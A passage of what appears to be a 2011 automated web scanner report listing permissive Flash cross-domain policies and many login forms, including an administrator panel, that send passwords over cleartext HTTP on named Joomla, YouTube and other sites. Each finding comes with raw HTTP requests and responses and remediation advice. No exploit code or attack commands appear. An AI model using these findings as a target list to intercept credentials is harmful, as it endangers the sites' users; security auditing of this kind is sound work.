Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.doclix.com

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:58:38 GMT
ETag: W/"205-1285004403000"
Last-Modified: Mon, 20 Sep 2010 17:40:03 GMT
Content-Type: application/xml
Content-Length: 205
Vary: Accept-Encoding
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.2. http://www.youtube.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 14:58:57 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 17:17:52 GMT
ETag: "132-49a363270b000"
Accept-Ranges: bytes
Content-Length: 306
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

6. Cleartext submission of password
There are 286 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


6.1. http://community.joomla.org/login.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /login.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://community.joomla.org/login.html
The form contains the following password field:
  • passwd

Request

GET /login.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:24:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:24:44 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
</div>
<form action="/login.html" method="post" name="com-login" id="com-form-login">
<table width="100%" border="0" align="center" cellpadding="4" cellspacing="0" class="contentpane">
...[SNIP]...
<br />
       <input type="password" id="passwd" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.2. http://community.joomla.org/showcase/

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /showcase/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://community.joomla.org/showcase/index.php
The form contains the following password field:
  • passwd

Request

GET /showcase/ HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=ff1c090dbcaab6cc278de2960e220011; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:32 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/showcase/index.php" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.3. http://community.joomla.org/showcase/how-to-submit-a-site.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /showcase/how-to-submit-a-site.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://community.joomla.org/showcase/how-to-submit-a-site.html
The form contains the following password field:
  • passwd

Request

GET /showcase/how-to-submit-a-site.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=be510ddcd2bf15612a74f73f10f6bdfe; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:53 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/showcase/how-to-submit-a-site.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.4. http://community.joomla.org/showcase/sites-of-the-month.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /showcase/sites-of-the-month.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://community.joomla.org/showcase/sites-of-the-month.html
The form contains the following password field:
  • passwd

Request

GET /showcase/sites-of-the-month.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=ff4fc6ec86026a313be3c261f8519100; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:52 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/showcase/sites-of-the-month.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.5. http://community.joomla.org/showcase/sites/advsearch.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /showcase/sites/advsearch.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://community.joomla.org/showcase/sites.html
The form contains the following password field:
  • passwd

Request

GET /showcase/sites/advsearch.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=6cd3aab8711a0481615375ee027eb309; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:49 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/showcase/sites.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.6. http://community.joomla.org/showcase/sites/new.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /showcase/sites/new.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://community.joomla.org/showcase/sites.html
The form contains the following password field:
  • passwd

Request

GET /showcase/sites/new.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=423eae15ca00d1e8cf624b675f042aa5; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:47 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 69155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/showcase/sites.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.7. http://community.joomla.org/user-groups.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /user-groups.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://community.joomla.org/user-groups.html
The form contains the following password field:
  • passwd

Request

GET /user-groups.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:22:56 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 205369


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<div class="moduletable-jedlogin">
                   <form action="/user-groups.html" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.8. http://demo16.cloudaccess.net/

Summary

Severity:   High
Confidence:   Certain
Host:   http://demo16.cloudaccess.net
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://demo16.cloudaccess.net/index.php
The form contains the following password field:
  • password

Request

GET / HTTP/1.1
Host: demo16.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:02:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Set-Cookie: 0d4018dcd0961c57d0d37c72abf6777f=0jc68bdosfv0usmfgmt3kojis0; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13991


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=
...[SNIP]...
</h3>
<form action="/index.php" method="post" id="login-form" >
   <div class="pretext">
...[SNIP]...
</label>
       <input id="modlgn-passwd" type="password" name="password" class="inputbox" size="18" />
   </p>
...[SNIP]...

6.9. http://demo16.cloudaccess.net/administrator/index.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://demo16.cloudaccess.net
Path:   /administrator/index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://demo16.cloudaccess.net/administrator/index.php
The form contains the following password field:
  • passwd

Request

GET /administrator/index.php HTTP/1.1
Host: demo16.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:01:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Set-Cookie: 3cd367566174a1f3a2f806869f69204d=tfi2vmv2kpu2qbp7plrssh0ha6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 4671
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
<div class="m">
               <form action="/administrator/index.php" method="post" id="form-login">
   <fieldset class="loginform">
...[SNIP]...
</label>
               <input name="passwd" id="mod-login-password" type="password" class="inputbox" size="15" />

               <label id="mod-login-language-lbl" for="lang">
...[SNIP]...

6.10. http://docs.joomla.org/index.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://docs.joomla.org/index.php?title=Special:UserLogin&action=submitlogin&type=signup&returnto=Main_Page
The form contains the following password fields:
  • wpPassword
  • wpRetype

Request

GET /index.php?title=Special:UserLogin&type=signup&returnto=Main_Page HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Content-language: en
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Set-Cookie: docsj_mediawiki_session=40d5d912ccf86251c09e6204ee9fda3b; path=/; HttpOnly
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<div id="userlogin">

<form name="userlogin2" id="userlogin2" method="post" action="/index.php?title=Special:UserLogin&amp;action=submitlogin&amp;type=signup&amp;returnto=Main_Page">
   <h2>
...[SNIP]...
<td class="mw-input">
               <input type='password' class='loginPassword' name="wpPassword" id="wpPassword2"
                   tabindex="2"
                   value="" size='20' />

           </td>
...[SNIP]...
<td class="mw-input">
               <input type='password' class='loginPassword' name="wpRetype" id="wpRetype"
                   tabindex="4"
                   value=""
                   size='20' />

           </td>
...[SNIP]...

6.11. http://extensions.joomla.org/

Summary

Severity:   High
Confidence:   Certain
Host:   http://extensions.joomla.org
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://extensions.joomla.org/index.php
The form contains the following password field:
  • passwd

Request

GET / HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=9b5564d7b57848ef22bf9ac141472038; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/index.php" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.12. http://extensions.joomla.org/extensions

Summary

Severity:   High
Confidence:   Certain
Host:   http://extensions.joomla.org
Path:   /extensions

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://extensions.joomla.org/extensions
The form contains the following password field:
  • passwd

Request

GET /extensions HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=8ce91e96c30d6b3c03ce44895359f0bf; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/extensions" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.13. http://extensions.joomla.org/extensions/advanced-search

Summary

Severity:   High
Confidence:   Certain
Host:   http://extensions.joomla.org
Path:   /extensions/advanced-search

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://extensions.joomla.org/extensions
The form contains the following password field:
  • passwd

Request

GET /extensions/advanced-search HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=662ff80b6519b113832192982b098a5a; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/extensions" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.14. http://extensions.joomla.org/extensions/languages/translations-for-joomla

Summary

Severity:   High
Confidence:   Certain
Host:   http://extensions.joomla.org
Path:   /extensions/languages/translations-for-joomla

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://extensions.joomla.org/extensions
The form contains the following password field:
  • passwd

Request

GET /extensions/languages/translations-for-joomla HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=119690ae64f99e48cab89680209b4270; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 72889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/extensions" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.15. http://extensions.joomla.org/extensions/new

Summary

Severity:   High
Confidence:   Certain
Host:   http://extensions.joomla.org
Path:   /extensions/new

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://extensions.joomla.org/extensions
The form contains the following password field:
  • passwd

Request

GET /extensions/new HTTP/1.1
Host: extensions.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: 3d56c873b463d3d3c1ccc249ca61c99d=bd83a0d831a42c661eb59a60c147c8f6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:11:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 78217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</h3>
                   <form action="/extensions" method="post" name="login" id="form-login" >
       <fieldset class="input">
...[SNIP]...
<br />
       <input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="18" alt="password" />
   </p>
...[SNIP]...

6.16. http://fastdial.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://fastdial.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://fastdial.com/welcome-fast-dial-firefox-4?destination=node%2F3
The form contains the following password field:
  • pass

Request

GET / HTTP/1.1
Host: fastdial.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:03:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
